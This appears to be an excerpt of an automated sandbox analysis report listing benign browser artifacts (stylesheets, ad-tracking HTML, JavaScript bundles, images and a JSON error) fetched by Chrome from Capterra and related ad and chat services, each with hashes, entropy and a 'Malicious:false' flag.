                                                                                                                                                                                                        Preview:body, div, dl, dt, dd, h1, h2, h3, h4, h5, h6, p, pre, code, blockquote {..margin:0;..padding:0;..border-width:0;..text-rendering:optimizeSpeed;.}.div > svg {..position:absolute;.}.#_idContainer000 {..-ms-transform:translate(-100.601px,115.199px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..-ms-transform-origin:0% 0%;..-webkit-transform:translate(-100.601px,115.199px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..-webkit-transform-origin:0% 0%;..height:540.00px;..left:0px;..position:absolute;..top:0px;..transform:translate(-100.601px,115.199px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..transform:translate(-100.601px,115.199px) rotate(0.000deg) skew(0.000deg) scale(1.000,1.000);..transform-origin:0% 0%;..transform-origin:0% 0%;..width:960.00px;.}.img._idGenObjectAttribute-1 {..height:100.00%;..min-width:100%;..width:100.00%;.}.img._idGenObjectAttribute-2 {..left:0px;..position:absolute;..top:0px;.}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (3267), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3267
                                                                                                                                                                                                        Entropy (8bit):5.789083710532473
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:YyRkcky7ghES0zRC3U1zRn8DWUbC3Rg1WUbnRfyenb3:yhy7g6dtC3U1tn8D5C3K15n9yeb3
                                                                                                                                                                                                        MD5:45F4806DA4858BD1C5898846B38923D2
                                                                                                                                                                                                        SHA1:4941D963B2C438FB09290BE5CF2CE4350D25901A
                                                                                                                                                                                                        SHA-256:2CB43A05CC6466D3C3E47B36AA66880054E1703C9D80A6AD4AD4D1B4B83E0165
                                                                                                                                                                                                        SHA-512:E3E17432A9DF3A2BD8587A0DF151B1C60D305BFD8A1F5F4A8E24513F6BFE60A89D58D8BC642C24228B5EB07AE237B8477BB63E3A8E012E3E72B6CB9F9645DCC3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/rul/1072635088?random=1725034620739&cv=11&fst=1725034620739&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
                                                                                                                                                                                                        Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":2592000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1810143887.1725034608","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1810143887.1725034608\u0026ig_key=1sNHMxODEwMTQzODg3LjE3MjUwMzQ2MDg!2sZvl9fw!3sAAptDV4S2ail\u0026tag_eid=44804419","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1s1skHww!2sZvl9fw!3sAAptDV4S2ail","1i44804419"],"userBiddingSignals":[["597373890","139534625"],null,1725034623678621],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4266
                                                                                                                                                                                                        Entropy (8bit):7.155279565008011
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jCc5N26MT0D5MdtbZPAVwzVHlMQnqpuj6N:+0GcoYNMtKw/MQnxjY
                                                                                                                                                                                                        MD5:E8D0E16ECB8BAD35A462C2DDCD0C82FE
                                                                                                                                                                                                        SHA1:ACE9C6574B593F9DD79B94AC89CBEF4E2EA3D49B
                                                                                                                                                                                                        SHA-256:9265983B13A79C5A435CB3600A2CC8CD294A363CB61BCEE339947697A2E4E834
                                                                                                                                                                                                        SHA-512:0089455F92F92C3A88131C5E8E4F51FC028099F1B7210CCF5A07E0D1505FADE95DD10DDCF06035BA160599245D8F6A443D189CAEBE67EEFD9F7D26BA061F41BC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...;...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23897), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23897
                                                                                                                                                                                                        Entropy (8bit):5.309124558333512
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qiH5aLGGy474znD9oSZXH79WfhaONcgnCXg9:XuGGhaXXY5TcgnCXg9
                                                                                                                                                                                                        MD5:CD29B9BC973E48A7FCD0EE7153BDF03B
                                                                                                                                                                                                        SHA1:AC3E5CF1C0D4183B2DF14C34BEBB84B3EE657799
                                                                                                                                                                                                        SHA-256:7CB58278C8F54A62C0AFA6DA0C67B3A45AAD637A0BF614E9C0DD42B73CEE266B
                                                                                                                                                                                                        SHA-512:253356199738322AE0D761A162136D91BA00018B180FF54C4D014C0B8AE4A93F5DD4D21664E8C582A4DB73F0F4265D34604D2B4C03CEF02A67882815ED328C2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[52],{jrvE:function(e,t,n){"use strict";var r=n("nfbA"),a=n("cgfC"),i=n("a4gb"),o=n("+nxv"),c=n("usiZ"),s=n("nb4r"),u=n("2nP+"),l=n("AHQf"),d=n("jiYP"),p=n("zgdO"),f=n("bTzN"),v=n("jniC"),_=n("uIJS"),h=n("wQh9"),b=n("yvDu"),m=n("LvsC"),O=n("qytN"),g=n("7jL2"),y=n("LfGp"),j=n("uHEx"),E=n("Iwrg"),k=n("+OSO"),S=n("MiOA"),x=n("8dVd"),w=n("26VM"),T=n("mekd"),R=n("3QMb");function exceptionFromError(e,t){var n=parseStackFrames(e,t),r={type:t&&t.name,value:extractMessage(t)};return n.length&&(r.stacktrace={frames:n}),void 0===r.type&&""===r.value&&(r.value="Unrecoverable error caught"),r}function eventFromError(e,t){return{exception:{values:[exceptionFromError(e,t)]}}}function parseStackFrames(e,t){var n=t.stacktrace||t.stack||"",r=function getPopSize(e){if(e){if("number"===typeof e.framesToPop)return e.framesToPop;if(F.test(e.message))return 1}return 0}(t);try{return e(n,r)}catch(a){}return[]}var F=/Minified React error #\d+;/i;function extr
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4785), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4785
                                                                                                                                                                                                        Entropy (8bit):5.806404511991255
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUjjKFx:1DY0hf1bT47OIqWb1ajKf
                                                                                                                                                                                                        MD5:F0C5DB7AB27137E921A3DE83AE5BE61E
                                                                                                                                                                                                        SHA1:E1527A82E7674B6EB7175C163818338B993A91E6
                                                                                                                                                                                                        SHA-256:441632A51635EF3D84843C02A20F3C999C348E88F91F46296FC45D3D0FF96FDD
                                                                                                                                                                                                        SHA-512:52081007445BBB5BE20F63E2FF4F28D14902B54DA77D9472F370BA62C870F60E93521A506128B5E04EE229AEA0BA890E07CEA2634423D340409219A0C0B27876
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):18810
                                                                                                                                                                                                        Entropy (8bit):6.034085124410907
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:brJVuh+/cCKS+i3R7AqG1pqVLod/cg8YAmbau9FyEJWtnmdfYxyHW:hVTKFiB1G1nd/7XAmOsWtnswx4W
                                                                                                                                                                                                        MD5:5E8E129DE9BCD04C0506C3538D3F7E47
                                                                                                                                                                                                        SHA1:4D5B055477E4504162673C5E4706458400BE6222
                                                                                                                                                                                                        SHA-256:2DF10F725D75D1B27E0C800F67E014FCA8DAB4575F91E798A5499EFCD9B52B71
                                                                                                                                                                                                        SHA-512:DEEE83F8419F9F811244A57F06CDA2E6DF04D77E5AFBCB439DF1115899F9A2B8BDD7CBF9A0A48E3F573D3EDC09D866295D3928D6C395A4282388270FCC44C0DA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/send_client.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>6</title>. <defs>. <path d="M10.325,0 L107.675,0 C113.37734,0 118,4.62265996 118,10.325 L118,107.675 C118,113.37734 113.37734,118 107.675,118 L10.325,118 C4.62265996,118 0,113.37734 0,107.675 L0,10.325 C0,4.62265996 4.62265996,0 10.325,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" in2="SourceAlpha" operator="out" resu
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8100
                                                                                                                                                                                                        Entropy (8bit):7.928165034912485
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:73YaXtI4o3h4lBIXQxDlsFTNdqiMAeLltI4GkDe5p1FvF:73YaX+pRuIXPSWeL/yU+pT9
                                                                                                                                                                                                        MD5:709304D9878661A073C26FF24A0263B8
                                                                                                                                                                                                        SHA1:0CF32C2AAE967CD94CCF3BD5C783065A76B9E954
                                                                                                                                                                                                        SHA-256:1C3A294201FA7031203CF8D98C47451D3AC0322D56EF258AF91B65759C19E383
                                                                                                                                                                                                        SHA-512:3B57D2C828FC5E289A03DC424D2A2D420240D7E9B8E4555FD98DBAE789D1989C889F00EF587996B03891DAA04B21FC4B34CF49D1AC1969592D19CB121C2CACFB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.1 (Macintosh)" xmpMM:InstanceID="xmp.iid:51531A79361411ED8117A6A9EBB8A27F" xmpMM:DocumentID="xmp.did:51531A7A361411ED8117A6A9EBB8A27F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51531A77361411ED8117A6A9EBB8A27F" stRef:documentID="xmp.did:51531A78361411ED8117A6A9EBB8A27F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>a.'.....IDATx..].|..?..l..l..y...@..T". ".......`..V...m.m.m....V.k.( ...hQ.b.&D ....B..y?7....w.M..nf7.!.9.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1551), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1551
                                                                                                                                                                                                        Entropy (8bit):5.161128430694816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:0E01AZ14iwMsom6ZrEzZv9QxlM/sJ5u/sRxQ75jml61X5E1d1I:0EG+1prEzZvKxzTvQ7Rm0
                                                                                                                                                                                                        MD5:4127EECB7391C86AA101479BB190EBF8
                                                                                                                                                                                                        SHA1:AFE7D7A2AC54317CC66DFF15BBF8AEEC661415BB
                                                                                                                                                                                                        SHA-256:2A2789BF9ABA4C8AE6F230BAEFD3630D16DCFC9A89C172E4BD964AFCDDEABEB0
                                                                                                                                                                                                        SHA-512:3161FF966EEFE2E6EBBD4E74273B6C5A1446DF0F1B343F7270B67B0DE7063371811CA24FFAAA9EE937CC601FCFFBE5FE702F8D76E765501091887E66D40A0C2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937
                                                                                                                                                                                                        Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="manifest" href="/core/manifest.json"><link rel="dns-prefetch" href="https://js.driftt.com" crossorigin><link rel="dns-prefetch" href="https://customer.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://conversation.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://targeting.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://metrics.api.drift.com" crossorigin><title>Drift Widget</title><script type="text/javascript">__ENV__="PRODUCTION",__BUILD_ID__="20240822210811-ae8a2e9",__REGION__=window.location.search.match("[\\?&]region=([^&#]*)")?window.location.search.match("[\\?&]region=([^&#]*)")[1]:"US"</script><link rel="preload" href="/core/assets/js/runtime~main.72ecb88a.js" as="script" crossorigin="anonymous"><link rel="preload" href="/core/assets/j
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (40426), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):40426
                                                                                                                                                                                                        Entropy (8bit):5.27794228641859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:fUdudRdSCUdNKOkY3dxsdjd+QdlkqdXoYjmdvodSHJCRdkdssdQzKd1tdpIdnFez:KCSGYfr1YjKJCgE8hdlY2PC6CeqO
                                                                                                                                                                                                        MD5:D35E0F9D9A801AEFC3AF53D7C33622A2
                                                                                                                                                                                                        SHA1:D2C37F6BF776A04D5CB0B16C2BF612806FB1962C
                                                                                                                                                                                                        SHA-256:845A1B7BCD1FF0E8B91D5502B88ADEDB94D126BC49FCA6FED42902A4D7CCB63D
                                                                                                                                                                                                        SHA-512:3DF83FAF49670EED699A471C4CCFCC99C4FFABEC68DB6B815E88C0808B09FBAD62BE6C8B1CEB15AF6783562614439308473E94564BD5D21D90972D700889F557
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/9257-58e0a8addfcd2500.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9257],{15962:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(7653),o=r(57908),a=n.createContext(),i=r(96890);function l(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=Array(t);r<t;r++)n[r]=e[r];return n}var c=r(10803),u=["className","children"];function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var f=function(e){var t=e.className,r=e.children,l=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},a=Object.keys(e);for(n=0;n<a.length;n++)r=a[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);for(n=0;n<a.length;n++)r=a[n],!(t.indexOf(r)>=0)&&Object.prototype.propertyIsEnumerable.call(e,r)&&(o[r]=e[r])}return o}(e,u),f=(0,n.useCo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/track_click?consumer=spotlight&productId=145471
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2277
                                                                                                                                                                                                        Entropy (8bit):7.884262743519732
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:oBvzee8+fehAv1e2kYgzxAnowI8vBWEHHm+7p:oN7feQ/BowI8voq
                                                                                                                                                                                                        MD5:011FBB683C86605B52AC0B94DD49B205
                                                                                                                                                                                                        SHA1:E840EBD1DDF423B52D0A7A09C5AE5677824D1530
                                                                                                                                                                                                        SHA-256:0C6299D5A529B9E4620BA151B6586EB3767AB86097DBED7EC18ABF73D9632658
                                                                                                                                                                                                        SHA-512:8F9BCF735B0A44163A5FBE52EF96FCA750DD346DF0B932F903DD8B4E1420410EC6A6586438BDADBB5379180E33591DEB3B960D4943F176C3596CF5DF7AF4EE88
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.ml....../.>l.w......:nRE...CKiH..(QT.)%.)j..G.D...j.Q)?...Z*UE...E.)...& 0i.D.P0*.G05.m.y....y.9...........e..o..w.ygv..SiPT......DKB....-.%Z.J.$.hI(.P.%.DKB....-.%Z....,~].9......h..!P.......E...nBT'.>(..i..hR..X.. .duR.x...v.g...fDbz..5.\...F....{.....b..Z.h..Q...E..nm....b..l.u...].B@.PZ.+.Cf...o.....[."....Z.OGAd...(E....s....x2.....p.FuE...#...:......ODuhH.......g.?.1.0....h..m....>..-..'..*...gS.[[S..V.-.....7.....d.=.3.....-{..ycGj.]..6o,..Z.d..z.}mO....iC.2..|.0...kW.YF..e>...I.....Q..W..&.h..3.\..7.H.Z........j.z..A.w.5.n..T.;...{......s.i..h3x.;..)..K4..kK.xg.......OP^.[l3....!.g.......=:...M(.O>.D..v...h.+..O7...'Q..?.K'\..}F...s....?].w....E....=.\.*K4)...Ze~...!.%...G.;z~.iq..{..|../.......~....<.J.....rq........5..2.../...u"..2..B..U..-'.i.<.......[B..C0|$i."z}.f.>.i~...|`...]'..3.<Q..F!.|?]X.e.4.?....f6>}_[{.....,}q`....2....+....h...2... ...N\,..r..x..9.x..WLwa.._c.-
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):122129
                                                                                                                                                                                                        Entropy (8bit):5.457114994522494
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:bzcWNrOtdQEbkRHu27ieHu2/iMEqWwC8GqWxXnMKyToM7REOvtyCNRqLwf6A39sy:yXc1yJwf6A39skCi
                                                                                                                                                                                                        MD5:9ECAFE36E6C5B9ED9AA4EB8CFCE5D6C9
                                                                                                                                                                                                        SHA1:D3D51A55057C882718143FA2D22610C8B19B8FB8
                                                                                                                                                                                                        SHA-256:BE9C51C3EE7F1847269D44813146DB2CF684E7531BAEEB579B365F527A5F0241
                                                                                                                                                                                                        SHA-512:8AE71327BE8EDF97C19C1052816E03A74B57645F278B99CA1DA164AA49D75E91BA41F55734075C586707C74864585C3D5FC63EF117976981D64FE6ADB973D045
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/workspace/assets/reuseMain.css?v=3
                                                                                                                                                                                                        Preview::root{font-size:16px;line-height:24px}*,*:before,*:after{box-sizing:border-box;border-width:0;border-style:solid;border-color:transparent;outline-color:#1c6fd1}*:focus-visible{outline-width:2px;outline-style:solid;outline-color:#1c6fd1;outline-offset:2px}*:focus-visible.color-mode-dark{outline-color:#68c5ed}.uw-mfe-styles .hidden{display:none}.uw-mfe-styles .invisible{visibility:hidden}html{overflow-x:hidden;color:#363a41;-webkit-letter-spacing:.025em;-moz-letter-spacing:.025em;-ms-letter-spacing:.025em;letter-spacing:.025em;--global-bg-light:rgb(255,255,255);--global-bg-medium:rgb(242,248,251);--global-bg-dark:rgb(0,46,71)}.uw-mfe-styles .sb{position:relative}.uw-mfe-styles .sb.bkg-white{background:#fff!important;color:#000!important}.uw-mfe-styles .sb.bkg-white::-webkit-input-placeholder{color:#000}.uw-mfe-styles .sb.bkg-white::-moz-placeholder{color:#000}.uw-mfe-styles .sb.bkg-white:-ms-input-placeholder{color:#000}.uw-mfe-styles .sb.bkg-white::placeholder{color:#000}.uw-mfe-styles
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7146
                                                                                                                                                                                                        Entropy (8bit):7.96930613447563
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ozCwwrYD3Zbak4jxEt4dJg+I2qs487U3V:ozCww0rRud7B28QF
                                                                                                                                                                                                        MD5:040D82D0A2670BFCE1B921C6EC3B7252
                                                                                                                                                                                                        SHA1:5316A2B8C01ABCD26EF8B6C10830BCFC8DCEC342
                                                                                                                                                                                                        SHA-256:E619B7B2BB36564DBF4300CA086037CE7FFFDE10DE357D0CD837AAC8534E6E5D
                                                                                                                                                                                                        SHA-512:A4024DA5128E3C78710866AEFC4D6E030165DCA886DB1A0A7B48954B6EE8E929824428FF637AC0EC72EDF5028E24551A2F236C138C9C48765833C5D8F8A86CE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.].t.....W$Y...p...c...b......K(!l..$.@.K...d.p.I.s(..d).!1....8@....q.mu.6..uf.d,.O.......w......;s...}.. .%s..s9.t......Y}.3x|1n.9^|....c.......3.........t.......g.......=T.....2m8.(.r.......z.....^...\..........:.N?.55(n+v....+p....2.......J.....L..s...(b+n.=....]O..".v}...!V.v=dZ1d0._..P.V.@s:.'^.o^.2.q@.....<...Z..)................?....A..bZ%...r.y.....YA...._$.-.>M..g...~.......@....(._."...Xt.Z.x.(Q.b....?..=..7..8...C.a...6.;.O./...?.M.*.....4/_....67qu...A..`.D...(...u+.....Aq....g~..\.4..0 &U"....hS.H...%UX..=|;._..=.4...x.r...p.IW.`).vEC(.I.P\.H..W.NT`..<.#^.......%...*nZ.JP.`. ...B#.O).>8.Y..P.V<r.....7.W...[q....{4..........+u.Q..(.X.^..../?./..[c...m.._...0".x@T.....$|~...PD..Y2...N.T.o....gQr.>?@..on....MT..w.Y.#g..6...Y.zA.n......B...}!.... ...3kp.+.i.U..FN.7.\....V1.....!....(QG...O....b..:.......eQ.p.U{....5..U.Sh.....u_.~....7....hn..........(.Tq..I....@.R.5..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                        Entropy (8bit):4.54178832719941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YAv+e9BAJ6YSm7XJHIzRNg+wjNXWRwFH1j66qVVJMdMQUWKLb+AHfgq+WRHYn:YAme2J6YBDJHIlNgDXWqH1jwVJMyb/4l
                                                                                                                                                                                                        MD5:F447C440ABF2B8AF203938329FE494F8
                                                                                                                                                                                                        SHA1:3E071AE6400D84FB2EBE38EAEE60E1161D9F4556
                                                                                                                                                                                                        SHA-256:11BBA994684E05187E8CB291F03254CE7810FB3EABBC900299F078F2E584550F
                                                                                                                                                                                                        SHA-512:BC05CEC72D8512A1CE483156BDCD963199EBFFD224D991AABAD638D3FA075CD7C96E20B20B85C7224925B8263143772174B3BC824EA258C0B196C83E03007C9F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"errors":[{"code":"media_type_not_acceptable","message":"The Accept header should send a media type of application/json"}],"type":"error.list"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
